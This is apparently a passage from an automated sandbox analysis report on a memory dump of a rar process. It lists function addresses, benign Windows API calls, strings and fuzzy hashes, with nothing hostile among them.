                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CurrentProcess_invalid_parameter_noinfo
                                                            • String ID: *?$.
                                                            • API String ID: 2518042432-3972193922
                                                            • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                            • Instruction ID: 64d5ec9cd9896f1ec7e7edbb9f5847b990ef7bc0e0c6ef843cb0355aa6a0c831
                                                            • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                            • Instruction Fuzzy Hash: 6A51D472F18E96D5EB10EFA698004ACE7A4FB44BE8B844539DE1D17B85EF3CD0498724
                                                            Function 00007FF71D2FB340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                            • Instruction ID: 19ce600ae32a14c4d154e06e93f9f7dfee7abc48958476091da80b5672378542
                                                            • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                            • Instruction Fuzzy Hash: 74113D72F18A01CAE7109F75E4812AEB7B0F748758F80553ADA8D53A58DF3CC1488F10
                                                            Function 00007FF71D2D3144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1705453755-0
                                                            • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                            • Instruction ID: 998eabb84fae82628ac96fe2b52b5fbd409e3d139251004da068f5f9b9f3f303
                                                            • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                            • Instruction Fuzzy Hash: CE012D32A2CA8286EB70EB15E4513AAF3A1FB85754F800135E68C86588EE6CD649CF50
                                                            Function 00007FF71D316130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                            • Instruction ID: 3142ff2d175d67ee9d2f30394b1eb84a6fd6e981843c763d4d22322e54912a6a
                                                            • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                            • Instruction Fuzzy Hash: 2E419C72A09F46C9E700DF65E8417AAB7A4EB187A8F80413AEE5C07B55EE3CD029C754
                                                            Function 00007FF71D2C7988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Console$Mode$Handle$Readfflush
                                                            • String ID:
                                                            • API String ID: 1039280553-0
                                                            • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                            • Instruction ID: 397d50adedeba2eff0e9c159d2914447897caa3e7637f93d46ab3e611d306917
                                                            • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                            • Instruction Fuzzy Hash: 61215635E1CA52D7EA10AB25A804579E361FB89BB1F944134EE4A07764FE3CD94ECF10
                                                            Function 00007FF71D300140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 932687459-0
                                                            • Opcode ID: bded3eb97cd522293b02a364016924ca6bbff2ef19536e48150b63450b2bece9
                                                            • Instruction ID: 749570059b40a988022a4722cc7a4f0dd25756984be34d79b13aa7e5f678f447
                                                            • Opcode Fuzzy Hash: bded3eb97cd522293b02a364016924ca6bbff2ef19536e48150b63450b2bece9
                                                            • Instruction Fuzzy Hash: AC81E432A0CE92C5EB65AA11E5403BDE350FB44BA4F984139DA4D07B99FF7CE4498B20
                                                            Function 00007FF71D2BC468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: swprintf
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 233258989-2277559157
                                                            • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                            • Instruction ID: 6e2dea492649f8d6cb66f3c7c4ee51faba3fd3971c002ae33af1836a6cfab86a
                                                            • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                            • Instruction Fuzzy Hash: 0602D722B0CD8241FA24FA3195453FEE751AF497A0F840431DAAE57786EEBCE548DB21
                                                            Function 00007FF71D2D1634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                            • String ID: rtmp%d
                                                            • API String ID: 2308737092-3303766350
                                                            • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                            • Instruction ID: 43f196ec62ed3cb1a073739d324273c11130bf701fa4aba3f853712ab977ada0
                                                            • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                            • Instruction Fuzzy Hash: A7519322A1CD8684EA31FF21D8511FEA351BF447A4FE40131D91D97A9AFE3CD609CB20
                                                            Function 00007FF71D2FB650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateEventHandle$ErrorLast
                                                            • String ID: rar -ioff
                                                            • API String ID: 4151682896-4089728129
                                                            • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                            • Instruction ID: d3d2b8b8c66d8a2d820132002ead9b859654fc488c4068adc90c0df426ffa07c
                                                            • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                            • Instruction Fuzzy Hash: 74018B39E1DE16C2FA14BB70E950670E362AF48722FC80838D90E426A0FE3C704C8E30
                                                            Function 00007FF71D2FB470 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                            • API String ID: 667068680-1824683568
                                                            • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                            • Instruction ID: 303c51452162745e4b9e625ef137164773eb4ea312260c953b5344fcb183af62
                                                            • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                            • Instruction Fuzzy Hash: 21F0F635E0DF56C1EA54AB11F954069E361AF49BE0B885438D95E06724FE3CE54DCB20
                                                            Function 00007FF71D311ADC Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: +$-
                                                            • API String ID: 3215553584-2137968064
                                                            • Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                            • Instruction ID: 0af85b07cb4334079aa2860018761b4e6102b7a4ff63265d4e0702d7eff7244c
                                                            • Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
                                                            • Instruction Fuzzy Hash: 5C12C17AE0D943C5FB24BB5590856F9E295EB00774FC8433AC69A436C0FF2CA649CB24
                                                            Function 00007FF71D2CE49C Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Backup$Read$Seek$wcschr
                                                            • String ID:
                                                            • API String ID: 2092471728-0
                                                            • Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                            • Instruction ID: 58146ca3f48b9ce415dc180981c0b3805fa1d8c84df0d17dc8d2e82d36ce3918
                                                            • Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
                                                            • Instruction Fuzzy Hash: 4851563261CB8186EB20DF15E44016AF7A5FB85BA4F504235EAAD43B98EF3DD949CF10
                                                            Function 00007FF71D2FBC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                            • Instruction ID: 92adc0e7494241ff2dd1eab10bca433de819d5b0b94cf7d2a6391c53864484fb
                                                            • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                            • Instruction Fuzzy Hash: D5518AB2F18A51CAEB54DFB4D4401ACB7B1F708798B90403ADE1E56B58EF38D559CB10
                                                            Function 00007FF71D2FC254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
